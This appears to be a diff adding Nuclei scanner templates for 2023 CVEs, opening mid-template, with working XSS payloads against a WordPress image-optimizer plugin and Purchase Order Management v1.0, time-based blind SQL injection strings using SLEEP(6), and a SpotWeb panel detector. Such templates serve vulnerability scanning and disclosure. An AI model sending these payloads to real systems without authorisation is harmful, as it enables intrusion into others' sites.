Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(/XSS/)</script>")'
- 'contains(body_2, "peachpay")'
condition: and

44
http/cves/2023/CVE-2023-2122.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-2122
info:
name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in version 1.0.27
reference:
- https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78
- https://wordpress.org/plugins/image-optimizer-wd/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2122
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2122
cwe-id: CWE-79
metadata:
max-request: 2
verified: "true"
tags: cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wpscan,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<img src=a onerror=alert(document.domain)>")'
- 'contains(body_2, "Image optimizer")'
condition: and

34
http/cves/2023/CVE-2023-2130.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-2130
info:
name: Purchase Order Management v1.0 - SQL Injection (Unauthenticated)
author: theamanrawat
severity: critical
description: |
A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.
reference:
- https://github.com/zitozito1/bug_report/blob/main/SQLi.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-2130
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-2130
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2023,sqli,purchase-order-management-system,unauthenticated
http:
- method: GET
path:
- "{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "Supplier Name")'
condition: and

39
http/cves/2023/CVE-2023-29622.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2023-29622
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29622
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29622
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2023,sqli,purchase-order,poms
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect")'
condition: and

47
http/cves/2023/CVE-2023-29623.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2023-29623
info:
name: Purchase Order Management v1.0 - Cross Site Scripting (Reflected)
author: theamanrawat
severity: medium
description: |
Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-29623
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,purchase-order-management-system,unauth
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(document.domain)>"
- "incorrect"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

28
http/exposed-panels/spotweb-login-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: spotweb-login-panel
info:
name: SpotWeb Login Panel - Detect
author: theamanrawat
severity: info
metadata:
verified: true
shodan-query: title:"SpotWeb - overview"
tags: panel,spotweb,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SpotWeb - overview"
- "initSpotwebJs"
condition: and
- type: status
status:
- 200